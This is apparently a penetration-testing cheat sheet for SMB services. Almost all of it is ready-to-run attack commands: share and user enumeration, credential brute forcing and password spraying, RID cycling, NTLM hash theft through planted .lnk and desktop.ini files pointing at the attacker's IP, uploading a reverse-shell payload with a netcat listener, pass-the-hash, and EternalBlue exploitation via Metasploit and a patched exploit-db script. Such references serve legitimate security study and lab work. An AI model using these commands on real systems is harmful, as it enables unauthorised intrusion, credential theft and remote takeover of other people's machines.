SMB (Server Message Block) Pentesting

Enumeration

To enumerate automatically, we can use various tools such as nmap, smbclient, and so on

nmap --script smb-brute -p 445 <target-ip>
nmap --script smb-enum-shares.nse,smb-enum-users.nse -p 445 <target-ip>
nmap --script smb-enum* -p 445 <target-ip>
nmap --script smb-protocols -p 445 <target-ip>
nmap --script smb-vuln* -p 445 <target-ip>

# NetBIOS names
nmblookup -A 10.0.0.1
nbtscan 10.0.0.1
nbtscan -r 10.0.0.1/24

# Enum4linux
enum4linux <target-ip>
# All enumeration
enum4linux -a <target-ip>
# Verbose
enum4linux -v <target-ip>
# Specify username and password
enum4linux -u username -p password <target-ip>

# Enum4linux-ng
# -A: All simple enumeration including nmblookup
enum4linux-ng -A <target-ip>
# -As: All simple short enumeration without NetBIOS names lookup
enum4linux-ng -As <target-ip>
# -u: Specific username
# -p: Specific password
enum4linux-ng -u "administrator" -p "password" <target-ip>

# NetExec (https://www.netexec.wiki/)
netexec smb 10.0.0.0/24
netexec smb <target-ip>
netexec smb <target-ip-1> <target-ip-2>
netexec smb <target-ip> -u username -p password
netexec smb <target-ip> -u username -p password --users
# -M zerologon: Scan for ZeroLogon
# -M petitpotam: Scan for PetitPotam
netexec smb <target-ip> -u '' -p '' -M zerologon -M petitpotam
# -M petitpotam: Scan for PetitPotam

Copied!

Find Shared Folders

# -N: No password
# -L: List shared directories
smbclient -N -L <target-ip>
smbclient -L <target-ip> -U username

smbmap -H <target-ip>
# Recursive
smbmap -H <target-ip> -R
# Username and password
smbmap -u username -p password -H <target-ip>
# Execute a command
smbmap -u username -p password -H <target-ip> -x 'ipconfig'

netexec smb <target-ip> -u '' -p '' --shares
netexec smb <target-ip> -u username -p password --shares

impacket-psexec example.local/username@<target-ip>

Copied!

Brute Force Credentials

netexec smb <target-ip> -u username -p passwords.txt --continue-on-success
netexec smb <target-ip> -u usernames.txt -H ntlm_hashes.txt --continue-on-success

hydra -l username -P passwords.txt <target-ip> smb
hydra -L usernames.txt -p password <target-ip> smb

# RID Brute Force
netexec smb <target-ip> -u username -p password --rid-brute 20000

# Using Metasploit
msfconsole
msf> use auxiliary/scanner/smb/smb_login

Copied!

If we find credentials, we can use them for smbclient or WinRM.
If we got "STATUS_PASSWORD_MUST_CHANGE" for some users, we can update a current password to a new one.

smbpasswd -r <target-ip> -U <username>
# or
impacket-smbpasswd <DOMAIN>/<username>:<password>@<target-ip> -newpass <new-password>
# If you don't have impacket-smbpasswd, download it from a repository.
wget https://raw.githubusercontent.com/fortra/impacket/master/examples/smbpasswd.py

Copied!

RID Cycling Attack

RID enumeration.
It attempts to enumerate user accounts through null sessions.

# Anonymous logon
# 20000: Maximum RID to be cycled
impacket-lookupsid example.local/anonymous@<target-ip> 20000 -no-pass
impacket-lookupsid example.local/guest@<target-ip> 20000 -no-pass
impacket-lookupsid example.local/guest@<target-ip> 20000
# Specify user
impacket-lookupsid example.local/user@<target-ip> 20000 -hashes <lmhash>:<nthash>
impacket-lookupsid example.local/user@<target-ip> 20000


# USEFUL COMMAND
# This command extract usernames. It's useful for further enumeration which uses usernames.
# Replace the following keywords:
#  - `example.com` => Target domain
#  - `10.0.0.1`    => Target IP
#  - `DOMAIN`      => Target domain name
impacket-lookupsid example.com/guest@10.0.0.1 20000 -no-pass > tmp.txt | cat tmp.txt | grep SidTypeUser | cut -d ' ' -f 2 | sed 's/DOMAIN\\//g' | sort -u > users.txt && rm tmp.txt

Copied!

Password Spraying Attack

If we have a user password, we might be able to find another user with the same password.

# User enumeration
netexec smb <target-ip> -u John -p Password123 --users
netexec smb <target-ip> -u John -H <NTLM_HASH> --users

# Find users with same password
netexec smb <target-ip> -u users.txt -p Password123 --continue-on-success
netexec smb <target-ip> -u users.txt -p found_passwords.txt --continue-on-success
netexec smb <target-ip> -u users.txt -H <NTLM_HASH> --continue-on-success
netexec smb <target-ip> -u users.txt -H found_ntlm_hashes.txt --continue-on-success

Copied!

NTLM Stealing

Using ntlm_theft

# -g all: Generate all files.
# -s: Local IP (attacker IP)
# -f: Folder to store generated files.
python3 ntlm_theft -g all -s <local-ip> -f samples

Copied!

After generating files with ntlm_theft , put the .lnk file (samples.lnk here) to the shared folder.

smbclient -N //10.0.0.1/example

smb> put samples.lnk

Copied!

Now start Responder to retrieve the stolen NTLM hashes. Run the following command in our local machine:

sudo responder -I eth0

Copied!

Connect

You can use smbclient to connect the target.

# anonymous login
smbclient //10.0.0.1/somedir -N
# If the folder name contains spaces, surround with double quotes
smbclient "//10.0.0.1/some dir" -N
# Specify user
smbclient //10.0.0.1/somedir -U username
# nobody, no-pass
smbclient //10.0.0.1/somedir -N -U nobody
# Specify workgroup
smbclient -L 10.0.0.1 -W WORKGROUP -U username

Copied!

To get a Windows shell, run the following examples.

impacket-wmiexec example.local/username@10.0.0.1
# Pass the Hash
impacket-wmiexec -hashes abcdef0123456789abcdef0123456789:c2597747aa5e43022a3a3049a3c3b09d example.local/username@10.0.0.1

Copied!

Commands in SMB

After connecting, we can investigate the shared folder to find sensitive files or information.

List Folders/Files

smb> ls

Copied!

Download Folders/Files

smb> get sample.txt
# If the filename contains spaces, it need to be enclosed in double-quotes.
smb> get "Example File.txt"

Copied!

To download files recursively, run the following commands.

smb> mask ""
smb> recurse ON
smb> prompt OFF
smb> mget *

Copied!

Or using smbget from local machine.
Especially, it’s useful for downloading a large file rather than “get” command in smbclient.

smbget smb://<target-ip>/somedir/example.txt -U username
smbget -R smb://<target-ip>/somedir -U username

# Specify workgroup
smbget -R smb://<target-ip>/somedir -w WORKGROUP -U username

# as anonymous user
smbget smb://<target-ip>/somedir -U anonymous
password: anonymous

Copied!

Upload Files

# Upload a file
smb> put example.txt

Copied!

• Upload Reverse Shell Payload

If the website is associated with the SMB server, we can upload reverse shell script such as aspx, php and get a shell.
To create a payload, please refer to the Web Reverse Shell or the Reverse Shell with Metasploit.

Then upload it to the SMB server as below.

smb> put shell.aspx

Copied!

Don’t forget to start a listener for getting outcoming connection.

nc -lvnp 4444

Copied!

Now access to https://example.com/path/to/smb/share/shell.aspx.
We can get a shell.

Steal NTLM Hash with Desktop.ini

Reference: https://book.hacktricks.xyz/windows-hardening/ntlm/places-to-steal-ntlm-creds#desktop.ini

We can retrieve the hashes by putting desktop.ini file, that contains arbitrary icon resource path, to the shared folder.
Create a new desktop.ini in local machine.

[.ShellClassInfo]
IconResource=\\<local-ip>\test

Copied!

Then upload it to the writable shared folder.

smb> put desktop.ini

Copied!

Start responder in local machine.

responder -I tun0

Copied!

After a while, we can retrieve the NTLM hashes.

EternalBlue (MS17-010)

msfconsole
msf> use exploit/windows/smb/ms17_010_eternalblue
msf> set rhosts <target-ip>
msf> set lhost <local-ip>
msf> run
# If you cannot get a shell with the default payloed (windows/x64/meterpreter/reverse_tcp), try to change the payload
msf> set payload payload/generic/shell_reverse_tcp

Copied!

AutoBlue

AutoBlue is an automatic exploit.
Download the repository and run the following example command.

python zzz_exploit.py -target-ip <target-ip> -port 445 'username:password@target'

Copied!

Manual Exploiting

You need to have two files - exploit.py, mysmb.py

1. Download mysmb.py

   wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42315.py -O mysmb.py 
   
   # Convert DOS to UNIX
   dos2unix mysmb.py
   
   Copied!

2. Edit Some Lines of mysmb.py for Python3

   You need to edit some code because this exploit is old so only supports Python2.

   Line.69
   # transData = b''
   transData = ''
   
   Line.73
   # transData = ('\x00' * padLen) + str(parameters)
   transData = "".join(map(chr,(b'\x00' * padLen))) + str(parameters)
   
   Line.80
   # transData += ('\x00' * padLen) + data
   transData += "".join(map(chr,(b'\x00' * padLen))) + str(data)
   
   Line.231
   # req = str(pkt)
   req = pkt.getData()
   return b'\x00'*2 + pack('>H', len(req)) + req  # assume length is <6553
   
   Line.381
   # data += resp['Data'][1:]
   data += resp['Data'][1:].decode()
   
   Copied!

3. Download exploit.py

   wget -O exploit.py https://www.exploit-db.com/exploits/42315
   
   # Convert DOS to UNIX
   dos2unix exploit.py
   
   Copied!

4. Edit the Credentials in exploit.py

   
   ...
   username = "username"
   password = "password"
   ...
   
   
   Copied!

5. Run the script

   python exploit.py <target-ip> netlogon
   python exploit.py <target-ip> lsarpc
   python exploit.py <target-ip> samr
   
   Copied!

Launch SMB Server

impacket-smbserver share . -smb2support -username user -password pass

Copied!

Access from Remote Machine

net use \\<local-ip>\share /u:user pass

Copied!

Transfer Files

# Remote to Local
cp .\example.txt \\<local-ip>\share\example.txt

Copied!